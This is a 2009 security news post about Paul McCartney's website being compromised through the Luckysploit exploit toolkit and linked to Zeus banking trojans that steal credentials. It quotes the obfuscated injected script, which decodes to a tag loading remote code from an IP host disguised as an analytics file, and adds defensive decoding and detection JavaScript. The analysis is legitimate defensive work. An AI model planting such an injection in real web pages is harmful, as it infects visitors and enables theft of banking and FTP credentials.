Daily cyber threats and internet security news: network security, online safety and latest security alerts
April 7th, 2009 Compromised Through Exploit Toolkit, Visitors Might Get Private Data Stolen

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet, which was implicated in a $6 million commercial-account heist against 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing: intercepting POST data and keystrokes associated with the active browser session, as well as clipboard data pasted into the browser. While these actions facilitate Zeus' banking theft, they can also lead to the compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots; their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

var source = "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";
var result = "";
// Every character is shifted down by one code point, then the decoded markup is written into the page.
for (var i = 0; i < source.length; i++) result += String.fromCharCode(source.charCodeAt(i) - 1);
document.write(result);
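The snippet above is a single-character Caesar shift, so an analyst can recover what it writes into the page without executing it. The following is an added example (not code from the post or from ScanSafe) that reproduces the decoding loop safely, pulls out the script sources the decoded markup would load, and applies two triage heuristics a site owner or crawler can use: a remote script fetched from a bare IP host, and a path imitating a well-known analytics loader on a host that is not the real one. It also contains a pattern check for the obfuscation itself in raw page HTML. The encoded string is the one quoted in the post; the function names are my own.

```javascript
// Added example, not from the original write-up. The encoded string is the
// one shown in the post; helper names are assumptions made for illustration.
const INJECTED_SOURCE =
  "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";

// Reproduce the snippet's decoding loop without calling document.write:
// each character code is shifted down by `shift` (1 in the observed sample).
function decodeShift(source, shift = 1) {
  let result = "";
  for (let i = 0; i < source.length; i++) {
    result += String.fromCharCode(source.charCodeAt(i) - shift);
  }
  return result;
}

// Collect the src attribute of every <script> tag in the decoded markup.
function extractScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const sources = [];
  let match;
  while ((match = re.exec(html)) !== null) sources.push(match[1]);
  return sources;
}

// True when the URL's host is a dotted-quad IPv4 literal rather than a name.
function isIpLiteralHost(url) {
  try {
    return /^\d{1,3}(\.\d{1,3}){3}$/.test(new URL(url).hostname);
  } catch (e) {
    return false; // unparsable URL: leave it to manual review
  }
}

// Decode one injection and return what it loads plus any triage findings.
function triageInjection(source) {
  const decoded = decodeShift(source);
  const scripts = extractScriptSources(decoded);
  const findings = [];
  for (const src of scripts) {
    if (isIpLiteralHost(src)) {
      findings.push(`script loaded from bare IP host: ${src}`);
    }
    // A "google-analytics" path on anything but google-analytics.com is a look-alike.
    let host = "";
    try { host = new URL(src).hostname; } catch (e) { host = ""; }
    if (/google-analytics/i.test(src) && !/(^|\.)google-analytics\.com$/i.test(host)) {
      findings.push(`analytics look-alike path on non-Google host: ${src}`);
    }
  }
  return { decoded, scripts, findings };
}

// Flag raw page HTML that carries the obfuscation pattern itself:
// fromCharCode over a per-character offset, followed by document.write.
function looksLikeShiftObfuscation(pageHtml) {
  const shiftLoop = /String\.fromCharCode\([^)]*charCodeAt\([^)]*\)\s*[-+]\s*\d+\)/;
  return shiftLoop.test(pageHtml) && /document\.write/.test(pageHtml);
}

console.log(JSON.stringify(triageInjection(INJECTED_SOURCE), null, 2));
```

Running it shows the decoded markup is a remote script tag whose host is an IP literal and whose path mimics an analytics loader, which is the kind of finding that justifies pulling the page and rotating the site's FTP credentials.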

Compromises have also been observed on flat HTML-only sites, which strengthens the likelihood that compromised FTP credentials are the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Credit: Mary Landesman, ScanSafe Blog
